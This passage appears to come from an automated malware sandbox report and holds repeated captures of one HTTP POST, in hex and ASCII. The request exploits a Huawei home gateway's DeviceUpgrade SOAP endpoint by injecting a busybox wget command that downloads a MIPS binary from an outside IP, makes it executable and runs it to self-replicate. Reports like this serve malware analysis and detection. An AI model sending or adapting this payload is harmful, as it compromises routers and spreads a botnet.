2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 